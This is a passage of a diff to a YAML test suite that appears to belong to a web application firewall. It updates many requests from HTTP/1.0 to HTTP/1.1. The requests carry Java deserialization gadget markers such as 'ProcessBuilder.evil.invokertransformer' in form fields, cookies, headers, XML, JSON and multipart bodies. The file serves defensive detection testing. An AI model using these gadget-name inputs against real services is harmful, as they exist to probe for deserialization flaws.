           data: "<?xml version=\"1.0\"?><xml><ProcessBuilder.evil.clonetransformer attribute_name=\"attribute_value\">value</ProcessBuilder.evil.clonetransformer></xml>"
         output:
           log:
@@ -142,7 +142,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element ProcessBuilder.evil.clonetransformer=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -162,7 +162,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.clonetransformer\">element_value</element></xml>"
         output:
           log:
@@ -182,7 +182,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.clonetransformer</element></xml>"
         output:
           log:
@@ -202,7 +202,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">ProcessBuilder.evil.clonetransformer</element></l3></l2></l1></xml>"
         output:
           log:
@@ -222,7 +222,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.clonetransformer"
         output:
           log:
@@ -242,7 +242,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}"
         output:
           log:
@@ -262,7 +262,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}"
         output:
           log:
@@ -282,7 +282,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -308,7 +308,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -334,7 +334,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -360,7 +360,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -386,7 +386,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.forclosure"
         output:
           log:
@@ -406,7 +406,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "ProcessBuilder.evil.forclosure=test"
         output:
           log:
@@ -427,7 +427,7 @@ tests:
             Cookie: test=ProcessBuilder.evil.forclosure
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -448,7 +448,7 @@ tests:
             Cookie: ProcessBuilder.evil.forclosure=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -469,7 +469,7 @@ tests:
             test: ProcessBuilder.evil.forclosure
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -489,7 +489,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><ProcessBuilder.evil.forclosure attribute_name=\"attribute_value\">value</ProcessBuilder.evil.forclosure></xml>"
         output:
           log:
@@ -509,7 +509,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element ProcessBuilder.evil.forclosure=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -529,7 +529,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.forclosure\">element_value</element></xml>"
         output:
           log:
@@ -549,7 +549,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.forclosure</element></xml>"
         output:
           log:
@@ -569,7 +569,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">ProcessBuilder.evil.forclosure</element></l3></l2></l1></xml>"
         output:
           log:
@@ -589,7 +589,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.forclosure"
         output:
           log:
@@ -609,7 +609,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}"
         output:
           log:
@@ -629,7 +629,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}"
         output:
           log:
@@ -649,7 +649,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -675,7 +675,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -701,7 +701,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -727,7 +727,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -753,7 +753,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.instantiatefactory"
         output:
           log:
@@ -773,7 +773,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "ProcessBuilder.evil.instantiatefactory=test"
         output:
           log:
@@ -794,7 +794,7 @@ tests:
             Cookie: test=ProcessBuilder.evil.instantiatefactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -815,7 +815,7 @@ tests:
             Cookie: ProcessBuilder.evil.instantiatefactory=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -836,7 +836,7 @@ tests:
             test: ProcessBuilder.evil.instantiatefactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -856,7 +856,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><ProcessBuilder.evil.instantiatefactory attribute_name=\"attribute_value\">value</ProcessBuilder.evil.instantiatefactory></xml>"
         output:
           log:
@@ -876,7 +876,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element ProcessBuilder.evil.instantiatefactory=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -896,7 +896,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.instantiatefactory\">element_value</element></xml>"
         output:
           log:
@@ -916,7 +916,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.instantiatefactory</element></xml>"
         output:
           log:
@@ -936,7 +936,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">ProcessBuilder.evil.instantiatefactory</element></l3></l2></l1></xml>"
         output:
           log:
@@ -956,7 +956,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.instantiatefactory"
         output:
           log:
@@ -976,7 +976,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}"
         output:
           log:
@@ -996,7 +996,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}"
         output:
           log:
@@ -1016,7 +1016,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1042,7 +1042,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1068,7 +1068,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1094,7 +1094,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1120,7 +1120,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.instantiatetransformer"
         output:
           log:
@@ -1140,7 +1140,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "ProcessBuilder.evil.instantiatetransformer=test"
         output:
           log:
@@ -1161,7 +1161,7 @@ tests:
             Cookie: test=ProcessBuilder.evil.instantiatetransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1182,7 +1182,7 @@ tests:
             Cookie: ProcessBuilder.evil.instantiatetransformer=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1203,7 +1203,7 @@ tests:
             test: ProcessBuilder.evil.instantiatetransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1223,7 +1223,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><ProcessBuilder.evil.instantiatetransformer attribute_name=\"attribute_value\">value</ProcessBuilder.evil.instantiatetransformer></xml>"
         output:
           log:
@@ -1243,7 +1243,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element ProcessBuilder.evil.instantiatetransformer=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -1263,7 +1263,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.instantiatetransformer\">element_value</element></xml>"
         output:
           log:
@@ -1283,7 +1283,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.instantiatetransformer</element></xml>"
         output:
           log:
@@ -1303,7 +1303,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">ProcessBuilder.evil.instantiatetransformer</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1323,7 +1323,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.instantiatetransformer"
         output:
           log:
@@ -1343,7 +1343,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}"
         output:
           log:
@@ -1363,7 +1363,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}"
         output:
           log:
@@ -1383,7 +1383,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1409,7 +1409,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1435,7 +1435,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1461,7 +1461,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1487,7 +1487,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.invokertransformer"
         output:
           log:
@@ -1507,7 +1507,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "ProcessBuilder.evil.invokertransformer=test"
         output:
           log:
@@ -1528,7 +1528,7 @@ tests:
             Cookie: test=ProcessBuilder.evil.invokertransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1549,7 +1549,7 @@ tests:
             Cookie: ProcessBuilder.evil.invokertransformer=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1570,7 +1570,7 @@ tests:
             test: ProcessBuilder.evil.invokertransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1590,7 +1590,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><ProcessBuilder.evil.invokertransformer attribute_name=\"attribute_value\">value</ProcessBuilder.evil.invokertransformer></xml>"
         output:
           log:
@@ -1610,7 +1610,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element ProcessBuilder.evil.invokertransformer=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -1630,7 +1630,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.invokertransformer\">element_value</element></xml>"
         output:
           log:
@@ -1650,7 +1650,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.invokertransformer</element></xml>"
         output:
           log:
@@ -1670,7 +1670,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">ProcessBuilder.evil.invokertransformer</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1690,7 +1690,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.invokertransformer"
         output:
           log:
@@ -1710,7 +1710,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}"
         output:
           log:
@@ -1730,7 +1730,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}"
         output:
           log:
@@ -1750,7 +1750,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1776,7 +1776,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1802,7 +1802,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1828,7 +1828,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1854,7 +1854,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.prototypeclonefactory"
         output:
           log:
@@ -1874,7 +1874,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "ProcessBuilder.evil.prototypeclonefactory=test"
         output:
           log:
@@ -1895,7 +1895,7 @@ tests:
             Cookie: test=ProcessBuilder.evil.prototypeclonefactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1916,7 +1916,7 @@ tests:
             Cookie: ProcessBuilder.evil.prototypeclonefactory=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1937,7 +1937,7 @@ tests:
             test: ProcessBuilder.evil.prototypeclonefactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1957,7 +1957,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><ProcessBuilder.evil.prototypeclonefactory attribute_name=\"attribute_value\">value</ProcessBuilder.evil.prototypeclonefactory></xml>"
         output:
           log:
@@ -1977,7 +1977,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element ProcessBuilder.evil.prototypeclonefactory=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -1997,7 +1997,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.prototypeclonefactory\">element_value</element></xml>"
         output:
           log:
@@ -2017,7 +2017,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.prototypeclonefactory</element></xml>"
         output:
           log:
@@ -2037,7 +2037,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">ProcessBuilder.evil.prototypeclonefactory</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2057,7 +2057,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.prototypeclonefactory"
         output:
           log:
@@ -2077,7 +2077,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}"
         output:
           log:
@@ -2097,7 +2097,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}"
         output:
           log:
@@ -2117,7 +2117,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2143,7 +2143,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2169,7 +2169,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2195,7 +2195,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2221,7 +2221,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.prototypeserializationfactory"
         output:
           log:
@@ -2241,7 +2241,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "ProcessBuilder.evil.prototypeserializationfactory=test"
         output:
           log:
@@ -2262,7 +2262,7 @@ tests:
             Cookie: test=ProcessBuilder.evil.prototypeserializationfactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2283,7 +2283,7 @@ tests:
             Cookie: ProcessBuilder.evil.prototypeserializationfactory=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2304,7 +2304,7 @@ tests:
             test: ProcessBuilder.evil.prototypeserializationfactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2324,7 +2324,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><ProcessBuilder.evil.prototypeserializationfactory attribute_name=\"attribute_value\">value</ProcessBuilder.evil.prototypeserializationfactory></xml>"
         output:
           log:
@@ -2344,7 +2344,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element ProcessBuilder.evil.prototypeserializationfactory=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -2364,7 +2364,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.prototypeserializationfactory\">element_value</element></xml>"
         output:
           log:
@@ -2384,7 +2384,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.prototypeserializationfactory</element></xml>"
         output:
           log:
@@ -2404,7 +2404,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">ProcessBuilder.evil.prototypeserializationfactory</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2424,7 +2424,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.prototypeserializationfactory"
         output:
           log:
@@ -2444,7 +2444,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}"
         output:
           log:
@@ -2464,7 +2464,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}"
         output:
           log:
